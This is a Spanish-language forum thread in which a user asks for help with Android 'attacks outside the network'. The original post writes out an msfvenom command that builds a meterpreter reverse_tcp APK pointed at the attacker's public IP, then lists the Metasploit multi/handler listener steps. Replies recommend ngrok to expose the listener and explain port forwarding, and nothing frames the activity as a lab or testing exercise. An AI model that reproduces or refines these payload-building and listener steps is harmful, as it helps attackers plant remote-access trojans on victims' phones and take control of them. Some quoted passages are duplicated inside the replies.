|
Título: Problema, ataques fuera de red. Publicado por: painpills en 6 Marzo 2020, 04:21 am Hola, hace días que estuve probando ataques fuera de red utilizando apk's creadas con msfvenom. Al principio funcionaba todo correctamente, configuré mi ip local como DMZ de mi router para evitar problemas con los puertos, e incluso pude utilizar NO-IP con normalidad.
El problema es que hace un día o dos, simplemente han dejado de funcionarme los ataques fuera de red, Kali cambió la ip local de mi máquina pero inmediatamente actualicé el DMZ de mi router. Entonces pensé que podría ser un problema de NO-IP y decidí generar las apk's directamente con mi mi pública, de la siguiente manera. msfvenom -p android/meterpreter/reverse_tcp lhost=<mi ip publica> lport=4444 R>/root/Escritorio/aplicacion.apk Luego de haber generado la aplicación me pongo a la escucha de la siguiente forma. 1) use exploit/multi/hander 2) set payload android/meterpreter/reverse_tcp 3) set lport=<mi ip local> y también set lport=444 5) exploit Aún configurando la aplicación de esa manera sigue sin funcionar :-\ ¿Alguien tiene alguna idea de qué puede estar ocasionando este problema o como solucionarlo? ¿podría el cambio de ip haber ocasionado eso? Cambió tanto mi ip pública, como la local. Gracias. Título: Re: Problema, ataques fuera de red. Publicado por: UnaiiM en 6 Marzo 2020, 09:51 am Haber pero si lo haces fuera de la red local lo lógico es usar algo como ngrok. Ya que por lo que entiendo tu le estas diciendo al exploit que al ser ejecutado se conecte a una ip de una red la cual la persona que quieres atacar no esta en esa red. :rolleyes:
Haber ngrok haces público tu local host. No se si me equivoco, ya que no estoy muy informado en este tema,... Salu2! Título: Re: Problema, ataques fuera de red. Publicado por: painpills en 9 Marzo 2020, 23:50 pm No es una solución en si, ya que antes podía realizar ese tipo de tareas sin necesidad de otras aplicaciones, simplemente metasploit y no-ip, pero con el problema que se me ha presentado ngrok me ha sido muy útil, gracias por la información. ::)
Título: Re: Problema, ataques fuera de red. Publicado por: @XSStringManolo en 10 Marzo 2020, 01:21 am Tienes los puertos del router abiertos?
Por lo que pones creas el apk apuntando al puerto 4444 y te pones en la escucha al 444. Hay puertos externos y puertos internos. Tienes que abrir el puerto externo en la dirección que apunte el TCP reverso y abrir el interno hacia la máquina de tu red que está a la escucha. Por comodidad puedes usar print working directory en lugar de poner la ruta manual. msfvenom -p android/meterpreter/reverse_tcp lhost=<mi ip publica> lport=4444 R > pwd Cuando sea así prueba con el netcat a la escucha en el puerto 4444. A mi me van horribles las .apk generadas con msfvenom. Título: Re: Problema, ataques fuera de red. Publicado por: painpills en 10 Marzo 2020, 07:41 am Perdón, esa parte fue un error mío en la publicación, pongo a metasploit a escuchar el mismo puerto que va en el apk. y sobre los puertos pues creo que sí, lo que sucede es que la empresa que me presta el servicio de internet bloquea las opciones que me dejan abrir puertos manualmente, por eso configuré mi ip local como DMZ y eso me funcionó por un tiempo, según entiendo lo que hace el DMZ es redireccionar las conexiones que llegan a mi router hacia mi ip local y abre los puertos automáticamente cuando es necesario(que alguien me corrija si me equivoco), y aunque mi DMZ está configurado correctamente no puedo realizar ataques fuera de red sino es con ngrok que abre un canal para poder hacer el ataque. Entonces, no sé si se debe a alguna configuración erronea en mi sistema operativo(kali linux) o a la instalación de otra herramienta.
La única herramienta que instalé en ese entonces fue NO-IP. Espero que alguien pueda ayudarme con eso, ya que supongo que es algo cansino que se escriba en el foro únicamente por dudas, espero avanzar pronto en esto para poder realizar mis aportes ;-) Por lo que pones creas el apk apuntando al puerto 4444 y te pones en la escucha al 444. Hay puertos externos y puertos internos. Tienes que abrir el puerto externo en la dirección que apunte el TCP reverso y abrir el interno hacia la máquina de tu red que está a la escucha. Título: Re: Problema, ataques fuera de red. Publicado por: @XSStringManolo en 10 Marzo 2020, 18:24 pm Perdón, esa parte fue un error mío en la publicación, pongo a metasploit a escuchar el mismo puerto que va en el apk. y sobre los puertos pues creo que sí, lo que sucede es que la empresa que me presta el servicio de internet bloquea las opciones que me dejan abrir puertos manualmente, por eso configuré mi ip local como DMZ y eso me funcionó por un tiempo, según entiendo lo que hace el DMZ es redireccionar las conexiones que llegan a mi router hacia mi ip local y abre los puertos automáticamente cuando es necesario(que alguien me corrija si me equivoco), y aunque mi DMZ está configurado correctamente no puedo realizar ataques fuera de red sino es con ngrok que abre un canal para poder hacer el ataque. Entonces, no sé si se debe a alguna configuración erronea en mi sistema operativo(kali linux) o a la instalación de otra herramienta. Comprueba con netcat si te funciona correctamente la apertura y cierre de puertos.La única herramienta que instalé en ese entonces fue NO-IP. Espero que alguien pueda ayudarme con eso, ya que supongo que es algo cansino que se escriba en el foro únicamente por dudas, espero avanzar pronto en esto para poder realizar mis aportes ;-) Si no te funciona llama a tu ISP y dile que abriste los puertos y no te llegan los paquetes, que te habiliten abrir y cerrar puertos cuando consideres, si no te cambias de compañía. Si pones tu equipo como DMZ lo expones a internet y si no tienes un firewall de internet a tu DMZ y otro firewall que evite conexiones de tu DMZ a tu red local estás totalmente expuesto. |